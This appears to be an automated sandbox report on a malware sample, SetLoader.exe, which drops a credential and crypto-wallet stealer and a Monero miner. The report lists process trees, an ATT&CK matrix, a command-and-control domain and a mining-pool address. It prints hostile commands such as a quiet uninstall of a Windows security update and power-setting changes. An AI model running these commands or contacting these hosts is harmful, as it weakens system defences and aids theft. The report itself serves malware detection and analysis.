              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtProtectVirtualMemory: Direct from: 0x140AF7AC9
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtProtectVirtualMemory: Direct from: 0x140947D71
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeNtProtectVirtualMemory: Direct from: 0x140927E98Jump to behavior
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtProtectVirtualMemory: Direct from: 0x1408FCB79
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeNtOpenFile: Direct from: 0x140B073F7
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeNtProtectVirtualMemory: Direct from: 0x140EDB319Jump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeThread register set: target process: 7112
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeThread register set: target process: 6072
              Modifies the hosts file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0062DAE0 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,_swprintf,GetLastError,GetLastError,GetTickCount,_swprintf,GetLastError,GetModuleFileNameW,_swprintf,CreateFileMappingW,GetCommandLineW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,_swprintf,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongW,SetWindowLongW,SetDlgItemTextW,_wcslen,_swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,0_2_0062DAE0
              Source: C:\Users\user\Desktop\SetLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe" Jump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" Jump to behavior
              Source: C:\Users\user\Desktop\SetLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\dwm.exe dwm.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0062CEBF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,0_2_0062CEBF
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_006227A9 cpuid 0_2_006227A9
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0062D0AB
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0063037C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,CloseHandle,0_2_0063037C
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0061D076 GetVersionExW,0_2_0061D076
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Modifies power options to not sleep / hibernate
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\ProgramData\PcHealthTool\HealthTool.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Modifies the hosts file
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

              Stealing of Sensitive Information

              barindex
              Tries to harvest and steal Bitcoin Wallet information
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Exploitation for Privilege Escalation              		1
              File and Directory Permissions Modification              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		11
              Windows Service              		1
              Abuse Elevation Control Mechanism              		1
              Disable or Modify Tools              		1
              Credential API Hooking              		12
              File and Directory Discovery              		Remote Desktop Protocol11
              Data from Local System              		1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter              		Logon Script (Windows)1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              Credentials in Registry              		56
              System Information Discovery              		SMB/Windows Admin Shares1
              Credential API Hooking              		2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              Service Execution              		Login Hook11
              Windows Service              		1
              Abuse Elevation Control Mechanism              		NTDS131
              Security Software Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script111
              Process Injection              		2
              Obfuscated Files or Information              		LSA Secrets1
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials131
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              File Deletion              		Proc Filesystem1
              Remote System Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
              Masquerading              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron131
              Virtualization/Sandbox Evasion              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd111
              Process Injection              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1498675 Sample: SetLoader.exe Startdate: 25/08/2024 Architecture: WINDOWS Score: 100 79 xmr-eu1.nanopool.org 2->79 81 animoanimalestop.fun 2->81 109 Malicious sample detected (through community Yara rule) 2->109 111 Antivirus detection for dropped file 2->111 113 Multi AV Scanner detection for submitted file 2->113 117 7 other signatures 2->117 9 SetLoader.exe 12 2->9         started        13 HealthTool.exe 2->13         started        signatures3 115 DNS related to crypt mining pools 79->115 process4 file5 69 C:\Users\user\AppData\Local\Temp\...\w1.exe, PE32+ 9->69 dropped 119 Drops large PE files 9->119 15 w2.exe 1 2 9->15         started        19 w3.exe 9->19         started        21 w1.exe 9->21         started        71 C:\Windows\Temp\kzezoxxlsgop.sys, PE32+ 13->71 dropped 121 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 13->121 123 Protects its processes via BreakOnTermination flag 13->123 125 Found strings related to Crypto-Mining 13->125 127 5 other signatures 13->127 24 powershell.exe 13->24         started        26 dwm.exe 13->26         started        28 cmd.exe 13->28         started        30 10 other processes 13->30 signatures6 process7 dnsIp8 73 C:\ProgramData\PcHealthTool\HealthTool.exe, PE32+ 15->73 dropped 75 C:\Windows\System32\drivers\etc\hosts, ASCII 15->75 dropped 87 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 15->87 89 Uses powercfg.exe to modify the power settings 15->89 91 Drops large PE files 15->91 105 3 other signatures 15->105 32 powershell.exe 23 15->32         started        35 cmd.exe 1 15->35         started        37 cmd.exe 15->37         started        47 13 other processes 15->47 77 C:\Users\user\AppData\...\WmiPrvSE.exe, PE32+ 19->77 dropped 93 Found direct / indirect Syscall (likely to bypass EDR) 19->93 83 animoanimalestop.fun 172.67.195.146, 443, 49736, 49737 CLOUDFLARENETUS United States 21->83 95 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 21->95 97 Tries to harvest and steal browser information (history, passwords, etc) 21->97 99 Tries to harvest and steal Bitcoin Wallet information 21->99 101 Loading BitLocker PowerShell Module 24->101 39 conhost.exe 24->39         started        85 146.59.154.106, 10343, 49745 OVHFR Norway 26->85 103 Query firmware table information (likely to detect VMs) 26->103 41 conhost.exe 28->41         started        43 wusa.exe 28->43         started        45 conhost.exe 30->45         started        49 8 other processes 30->49 file9 signatures10 process11 signatures12 107 Loading BitLocker PowerShell Module 32->107 51 conhost.exe 32->51         started        53 conhost.exe 35->53         started        55 wusa.exe 35->55         started        57 conhost.exe 37->57         started        59 choice.exe 37->59         started        61 conhost.exe 47->61         started        63 conhost.exe 47->63         started        65 conhost.exe 47->65         started        67 10 other processes 47->67 process13

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              SetLoader.exe19%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exe100%AviraTR/Crypt.OPACK.Gen

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              xmr-eu1.nanopool.org2%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://support.mozilla.org0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              http://digitalbush.com/projects/masked-input-plugin/#license)0%Avira URL Cloudsafe
              https://animoanimalestop.fun/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8r0%Avira URL Cloudsafe
              https://animoanimalestop.fun:4430%Avira URL Cloudsafe
              https://animoanimalestop.fun/m0%Avira URL Cloudsafe
              https://animoanimalestop.fun/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D0%Avira URL Cloudsafe
              https://animoanimalestop.fun/%0%Avira URL Cloudsafe
              https://animoanimalestop.fun/C0%Avira URL Cloudsafe
              https://animoanimalestop.fun/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D1%VirustotalBrowse
              http://digitalbush.com/projects/masked-input-plugin/#license)0%VirustotalBrowse
              https://animoanimalestop.fun/f0%Avira URL Cloudsafe
              https://animoanimalestop.fun/G0%Avira URL Cloudsafe
              https://xmrig.com/docs/algorithms0%Avira URL Cloudsafe
              https://animoanimalestop.fun:4430%VirustotalBrowse
              https://animoanimalestop.fun:443/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNH0%Avira URL Cloudsafe
              https://animoanimalestop.fun/0%Avira URL Cloudsafe
              https://xmrig.com/docs/algorithms2%VirustotalBrowse
              https://animoanimalestop.fun/0%VirustotalBrowse
              https://animoanimalestop.fun:44380%Avira URL Cloudsafe
              https://animoanimalestop.fun/Y0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              animoanimalestop.fun
              		172.67.195.146
              		truefalse
                		unknown
                xmr-eu1.nanopool.org
                		51.15.58.224
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://animoanimalestop.fun/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3Dfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://animoanimalestop.fun/mw1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://digitalbush.com/projects/masked-input-plugin/#license)w1.exe, 00000004.00000000.2038525410.0000000000B2C000.00000002.00000001.01000000.00000009.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://animoanimalestop.fun:443w1.exe, 00000004.00000003.2251052982.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2268729226.0000000000EEA000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000002.2306124438.0000000000EEA000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://animoanimalestop.fun/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8rw1.exe, 00000004.00000003.2282018670.0000000000EE0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://animoanimalestop.fun/%w1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://animoanimalestop.fun/Cw1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://animoanimalestop.fun/fw1.exe, 00000004.00000003.2214655196.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://animoanimalestop.fun/Gw1.exe, 00000004.00000002.2317476232.0000000007F01000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://xmrig.com/docs/algorithmsHealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://animoanimalestop.fun:443/728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHw1.exe, 00000004.00000003.2268209246.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000002.2317476232.0000000007EF0000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2223062248.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, w1.exe, 00000004.00000003.2214655196.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
